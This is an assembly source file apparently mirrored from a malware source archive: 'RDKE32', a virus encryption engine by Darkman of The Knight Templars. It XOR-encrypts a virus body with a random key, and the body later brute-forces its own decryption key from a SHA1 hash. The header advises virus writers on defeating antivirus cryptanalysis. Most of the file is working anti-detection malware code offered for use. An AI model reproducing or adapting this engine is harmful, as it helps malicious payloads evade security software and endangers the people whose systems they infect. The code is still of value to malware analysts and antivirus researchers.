mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 15:05:27 +00:00
241 lines
7.8 KiB
PHP
241 lines
7.8 KiB
PHP
comment *
|
|
ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
|
ßßßÛÛÛÛÛÛ ÜÜ ßßß ßßß ÜÜÜ ÛÛÛÛÛÛßßß
|
|
±ÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛ°
|
|
ÛÛÛÛ ÛÛÛÛÛÛ ²ÛÛÛÛÛ ÛÛÛÛ
|
|
ÛÛÛÛ ßÛÛÛÛ± ÜÛÛÛÛ² ÛÛÛÛ
|
|
°ÛÛÛÛ ÛÛÛÛÛßÛÛÛÛß ÛÛÛÛ
|
|
±ÛÛÛÛ ÛÛÛÛ² ÛÛÜÜ ÛÛÛÛ°
|
|
ÜÜÜÜÜÜÜÜÜÜÜÜÜ ²ÛÛÛÛ ÛÛÛÛ± ÛÛÛÛ²Ü ÛÛÛÛ± ÜÜÜÜÜÜÜÜÜÜÜÜ
|
|
Û ÛÛÛÛÛ ÛÛÛÛ² ²ÛÛÛÛÛ° ÛÛÛÛ² Û
|
|
Û ÛÛÛÛÛ ÜÛÛÛÛÛ ²ÛÛÛÛ² ÛÛÛÛÛ Û
|
|
ßÜ ßßßßß ßßßß ßßßß ßßßßß Üß
|
|
ÜßßßßßßßßßßßßßßßßþThe Knight TemplarsþßßßßßßßßßßßßßßßÜ
|
|
Û Û
|
|
Û Random Decoding Key Engine 32-bit v 1.0 [RDKE32] Û
|
|
Û Code by Û
|
|
Û Darkman/TKT Û
|
|
Û Û
|
|
ßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜß
|
|
|
|
|
|
Do not use this engine to encrypt known plaintext such as the actual virus
|
|
code. It is possible to decrypt known plaintext encrypted with this
|
|
engine using the X-RAY technique, also known as cryptanalysis. You can read
|
|
more about this technique in "Detecting oh, roughly every polymorphic engine
|
|
out there", an article by Rhincewind/VLAD, published in VLAD Magazine issue
|
|
4. Billy Belcebu/iKx did this mistake in Win32.Legacy using his Internal
|
|
ENCryptor v 1.0 [iENC], a Random Decoding Key (RDK) engine using a 8-bit
|
|
eXclusive OR (XOR) algorithm to encrypt the actual virus in 19 different
|
|
blocks.
|
|
|
|
Length of Random Decoding Key Engine 32-bit v 1.0 [RDKE32]: 171 bytes.
|
|
*
|
|
|
|
hash_size equ (0a0h/08h)
|
|
|
|
_RDKE32Encrypt struc
|
|
_lpHash dd ?
|
|
_lpBuffer dd ?
|
|
_dwNumberOfBytesToHashAndEncrypt dd ?
|
|
_dwSecurityLevel dd ?
|
|
ends
|
|
|
|
_RDKE32Decrypt struc
|
|
_lpHash dd ?
|
|
_lpBuffer dd ?
|
|
_dwNumberOfBytesToDecrypt dd ?
|
|
ends
|
|
|
|
_pushad struc
|
|
_edi dd ?
|
|
_esi dd ?
|
|
_ebp dd ?
|
|
_esp dd ?
|
|
_ebx dd ?
|
|
_edx dd ?
|
|
_ecx dd ?
|
|
_eax dd ?
|
|
ends
|
|
|
|
rdke32_begin:
|
|
; RDKE32Encrypt
|
|
;
|
|
;
|
|
; The RDKE32Encrypt function creates a hash and encrypts data.
|
|
;
|
|
; VOID RDKE32Encrypt(
|
|
; LPVOID lpHash // data buffer to receive hash
|
|
; LPVOID lpBuffer // data buffer of data to hash and encrypt
|
|
; DWORD dwNumberOfBytesToHashAndEncrypt // number of bytes to hash and
|
|
; // encrypt
|
|
; DWORD dwSecurityLevel // security level
|
|
; );
|
|
;
|
|
; Parameters
|
|
; lpHash
|
|
; [out] Pointer to the buffer that receives the hash.
|
|
; lpBuffer
|
|
; [out] Pointer to the buffer containing the data to be hashed and encrypted.
|
|
; dwNumberOfBytesToHashAndEncrypt
|
|
; [in] Specifies the number of bytes to be hashed and encrypted.
|
|
; dwSecurityLevel
|
|
; [in] Specifies the security level of the encryption. The higher it is the
|
|
; longer it will take for RDKE32Decrypt to bruteforce and decrypt the
|
|
; encrypted data.
|
|
;
|
|
; Return Values
|
|
; This function does not return a value.
|
|
|
|
RDKE32Encrypt proc ; Random Decoding Key Engine 32-bit
|
|
; v 1.00 [RDKE32] encryptor
|
|
pushad
|
|
mov edi,[esp._lpHash+size _pushad+04h]
|
|
; Pointer to the buffer that receives
|
|
; the hash
|
|
mov ebx,[esp._lpBuffer+size _pushad+04h]
|
|
; Pointer to the buffer containing the
|
|
; data to be hashed and encrypted
|
|
mov ecx,[esp._dwNumberOfBytesToHashAndEncrypt+size _pushad+04h]
|
|
; Specifies the number of bytes to be
|
|
; hashed and encrypted
|
|
mov eax,[esp._dwSecurityLevel+size _pushad+04h]
|
|
; Specifies the security level
|
|
|
|
call SHA1, edi, ecx, ebx
|
|
insecure_key:
|
|
call GetRandomNumberWithinRange
|
|
call test_key_security
|
|
jz insecure_key
|
|
|
|
call cryptor
|
|
popad
|
|
|
|
ret size _RDKE32Encrypt
|
|
endp
|
|
|
|
; RDKE32Decrypt
|
|
;
|
|
;
|
|
; The RDKE32Decrypt function creates a hash and encrypts data.
|
|
;
|
|
; VOID RDKE32Decrypt(
|
|
; LPVOID lpHash // data buffer of hash
|
|
; LPVOID lpBuffer // data buffer of data to decrypt
|
|
; DWORD dwNumberOfBytesToDecrypt // number of bytes to decrypt
|
|
; );
|
|
;
|
|
; Parameters
|
|
; lpHash
|
|
; [in] Pointer to the buffer containing the hash.
|
|
; lpBuffer
|
|
; [out] Pointer to the buffer containing the data to decrypted.
|
|
; dwNumberOfBytesToDecrypt
|
|
; [in] Specifies the number of bytes to be decrypted.
|
|
;
|
|
; Return Values
|
|
; This function does not return a value.
|
|
|
|
RDKE32Decrypt proc ; Random Decoding Key Engine 32-bit
|
|
; v 1.00 [RDKE32] decryptor
|
|
pushad
|
|
mov edi,[esp._lpHash+size _pushad+04h]
|
|
; Pointer to the buffer of the hash
|
|
mov ebx,[esp._lpBuffer+size _pushad+04h]
|
|
; Pointer to the buffer containing the
|
|
; data to be decrypted
|
|
mov ecx,[esp._dwNumberOfBytesToDecrypt+size _pushad+04h]
|
|
; Specifies the number of bytes to be
|
|
; decrypted
|
|
sub esp,hash_size
|
|
|
|
mov esi,esp ; ESI = pointer to the hash
|
|
xor edx,edx
|
|
bruteforce_loop:
|
|
inc edx ; EDX = 32-bit encryption/decryption
|
|
; key
|
|
call test_key_security
|
|
jz bruteforce_loop
|
|
|
|
call cryptor
|
|
|
|
call SHA1, esi, ecx, ebx
|
|
|
|
pushad
|
|
push (hash_size/04h)
|
|
pop ecx
|
|
rep cmpsd ; Succesfully decrypted the buffer to
|
|
; be decrypted?
|
|
popad
|
|
je RDKE32Decrypt_exit
|
|
|
|
call cryptor
|
|
|
|
jmp bruteforce_loop
|
|
RDKE32Decrypt_exit:
|
|
add esp,hash_size
|
|
popad
|
|
|
|
ret size _RDKE32Decrypt
|
|
endp
|
|
|
|
test_key_security proc ; Test the security of the 32-bit key
|
|
pushad
|
|
|
|
test eax,eax ; Insecure key?
|
|
jz test_key_exit
|
|
|
|
push 03h
|
|
pop ecx
|
|
test_key_loop:
|
|
mov eax,edx ; EDX = 32-bit encryption/decryption
|
|
; key
|
|
mov ebx,ecx
|
|
_test_key_loop:
|
|
rol eax,08h
|
|
|
|
test al,dl
|
|
jz test_next_key
|
|
|
|
cmp al,dl ; Insecure key?
|
|
je test_key_exit
|
|
test_next_key:
|
|
dec ebx
|
|
jnz _test_key_loop
|
|
|
|
rol edx,08h
|
|
|
|
loop test_key_loop
|
|
|
|
inc ecx ; Secure key
|
|
test_key_exit:
|
|
popad
|
|
|
|
ret
|
|
endp
|
|
|
|
cryptor proc ; 32-bit encryptor/decryptor
|
|
pushad
|
|
crypt_loop:
|
|
inc ecx
|
|
|
|
test dl,dl ; Insecure key?
|
|
jz dont_crypt
|
|
|
|
dec ecx
|
|
|
|
xor [ebx],dl
|
|
inc ebx
|
|
dont_crypt:
|
|
rol edx,08h
|
|
|
|
loop crypt_loop
|
|
popad
|
|
|
|
ret
|
|
endp
|
|
|
|
db ' [RDKE32] '
|
|
rdke32_end:
|
|
rdke32_size equ (rdke32_end-rdke32_begin)
|